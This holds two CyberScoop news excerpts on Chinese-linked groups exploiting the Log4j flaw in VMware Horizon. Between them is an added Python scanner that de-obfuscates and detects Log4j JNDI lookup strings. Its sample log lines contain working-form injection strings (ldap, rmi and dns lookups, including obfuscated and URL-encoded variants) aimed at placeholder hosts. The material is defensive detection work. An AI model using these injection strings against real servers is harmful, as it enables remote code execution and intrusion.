Suspected Chinese hackers use Log4j flaw to deploy Night Sky ransomware, Microsoft warns

A China-based ransomware operator has been exploiting a vulnerability in the Log4j logging library to attack internet-facing systems running a popular virtualization service, Microsoft analysts reported Monday. The findings point toward attacks on VMware Horizon, an application that gives remote users access to virtual computers and servers. Successful attacks have led to the deployment of ransomware by a hacking campaign that calls itself Night Sky. The group behind this effort has previously deployed other ransomware strains, including LockFile, AtomSilo, and Rook, the Microsoft researchers reported. This new campaign, which dates back to Jan. 4 (Log4j-based exploitation of VMware Horizon was first spotted toward the end of December), relies in part on spoofed domains made to look as though they are associated with known technology firms such as TrendMicro, Sophos, Nvidia, and Rogers. VMware issued remediation guidance on Dec. 14, less than a week after […]

The post Suspected Chinese hackers use Log4j flaw to deploy Night Sky ransomware, Microsoft warns appeared first on CyberScoop.


Chinese hackers use Log4j exploit to go after academic institution

A Chinese hacking group known for industrial espionage and intelligence collection used a vulnerability in Log4j to go after a large academic institution, researchers at CrowdStrike revealed Wednesday. Threat analysts observed the group attempting to install malware after gaining access using a modified version of a Log4j exploit for VMware Horizon, a virtual workspace technology. CrowdStrike also observed the Chinese hackers trying to harvest credentials for further exploitation. CrowdStrike analysts believe that the group behind the attack, which it is calling “Aquatic Panda,” has likely been active since at least May 2020. Its operations have primarily focused on targets in the telecommunications, technology and government sectors. “Because OverWatch disrupted the attack before AQUATIC PANDA could take action on their objectives, their exact intent is unknown,” Param Singh, vice president of CrowdStrike OverWatch, wrote to CyberScoop in an email. “This adversary, however, is known to use tools to maintain persistence in environments […]
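Neither excerpt describes the exploit mechanics, but both campaigns (the Night Sky intrusions above and the Aquatic Panda activity here) hinge on the same thing: a Log4j lookup string of the CVE-2021-44228 `${jndi:...}` form reaching a logging call on an exposed Horizon host. The following is an added example, not code from CyberScoop, Microsoft, CrowdStrike or VMware: a small Python scanner that de-obfuscates the tricks seen in the wild (URL encoding, `${lower:}`/`${upper:}` wrappers, `${x:-y}` default-value splicing) before matching, and reports which JNDI scheme each log line carries. The access-log lines are constructed for illustration; the addresses and paths are placeholders, not indicators from either report.

```python
import re
from urllib.parse import unquote

# Innermost ${...} lookup: a brace pair containing no further "$", "{" or "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")

# Once de-obfuscated, a JNDI lookup reads "${jndi:<scheme>:...}". The schemes
# listed are the JNDI providers commonly abused via CVE-2021-44228.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|https?)\s*:", re.I)


def _resolve_inner(m: "re.Match[str]") -> str:
    """Collapse one obfuscating lookup to the literal text Log4j would evaluate it to."""
    body = m.group(1)
    key, sep, rest = body.partition(":")
    if sep and key.lower() in ("lower", "upper"):
        return rest.lower()            # ${lower:J} / ${upper:j} -> "j"
    if ":-" in body:
        return body.split(":-", 1)[1]  # ${env:NOPE:-j} or ${::-j} -> "j"
    return m.group(0)                  # a real lookup (jndi, date, ...): keep as-is


def normalize(text: str, max_rounds: int = 32) -> str:
    """URL-decode, then evaluate obfuscating lookups inside-out until the text is stable."""
    text = unquote(text)
    for _ in range(max_rounds):
        new = _INNER.sub(_resolve_inner, text)
        if new == text:
            break
        text = new
    return text


def find_jndi_schemes(line: str) -> list[str]:
    """Return the JNDI schemes found in one log line after de-obfuscation."""
    return [m.group(1).lower() for m in _JNDI.finditer(normalize(line))]


def scan(lines) -> list[tuple[int, list[str]]]:
    """Return (line_number, schemes) for every line that carries a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        schemes = find_jndi_schemes(line)
        if schemes:
            hits.append((n, schemes))
    return hits


# Constructed sample access-log lines (hypothetical, documentation-range IPs).
SAMPLE_LOG = [
    '203.0.113.9 - - [04/Jan/2022:10:11:12 +0000] "GET /portal/ HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.9 - - [04/Jan/2022:10:11:13 +0000] "GET /portal/ HTTP/1.1" 200 "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.9 - - [04/Jan/2022:10:11:14 +0000] "GET /portal/ HTTP/1.1" 200 "${${lower:j}${upper:n}di:${::-r}mi://198.51.100.7:1099/x}"',
    '203.0.113.9 - - [04/Jan/2022:10:11:15 +0000] "GET /?x=%24%7Bjndi%3Adns%3A%2F%2Fexfil.example%2Fa%7D HTTP/1.1" 404 "curl/7.79"',
    '203.0.113.9 - - [04/Jan/2022:10:11:16 +0000] "GET /?d=${date:yyyy-MM-dd} HTTP/1.1" 200 "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, schemes in scan(SAMPLE_LOG):
        print(f"line {n}: jndi lookup via {', '.join(schemes)}")
```

Normalizing before matching is the point: a plain `${jndi:` grep misses the nested-lookup variants on the third sample line, and the URL-encoded form on the fourth. In practice the scan belongs on every log the Horizon stack writes, not just the front-end access log, because the lookup fires wherever the attacker-controlled string is eventually logged.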

The post Chinese hackers use Log4j exploit to go after academic institution appeared first on CyberScoop.
